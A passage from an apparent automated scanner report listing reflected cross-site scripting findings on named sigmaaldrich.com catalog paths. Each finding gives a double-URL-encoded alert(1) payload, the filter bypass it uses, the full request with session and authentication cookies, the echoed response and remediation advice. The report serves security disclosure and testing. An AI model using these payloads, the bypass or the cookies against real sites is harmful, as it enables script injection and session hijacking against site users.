Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest8c264";alert(1)//84d63a888f4/life-science/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.119. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ead34%2522%253balert%25281%2529%252f%252f1355739c73c was submitted in the REST URL parameter 4. This input was echoed as ead34";alert(1)//1355739c73c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-scienceead34%2522%253balert%25281%2529%252f%252f1355739c73c/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:59 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-scienceead34";alert(1)//1355739c73c/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.120. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d3ac%2522%253balert%25281%2529%252f%252f8320d84cdb5 was submitted in the REST URL parameter 5. This input was echoed as 7d3ac";alert(1)//8320d84cdb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog7d3ac%2522%253balert%25281%2529%252f%252f8320d84cdb5 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog7d3ac";alert(1)//8320d84cdb5","E404") ;
   </script>
...[SNIP]...

1.121. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9588b%2522%253balert%25281%2529%252f%252fd694049d19c was submitted in the REST URL parameter 1. This input was echoed as 9588b";alert(1)//d694049d19c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content9588b%2522%253balert%25281%2529%252f%252fd694049d19c/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content9588b";alert(1)//d694049d19c/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.122. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1270%2522%253balert%25281%2529%252f%252f72a6bae4e31 was submitted in the REST URL parameter 2. This input was echoed as d1270";alert(1)//72a6bae4e31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichd1270%2522%253balert%25281%2529%252f%252f72a6bae4e31/areas-of-interest/life-science/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichd1270";alert(1)//72a6bae4e31/areas-of-interest/life-science/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.123. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e30da%2522%253balert%25281%2529%252f%252f329cab1f52b was submitted in the REST URL parameter 3. This input was echoed as e30da";alert(1)//329cab1f52b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-intereste30da%2522%253balert%25281%2529%252f%252f329cab1f52b/life-science/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
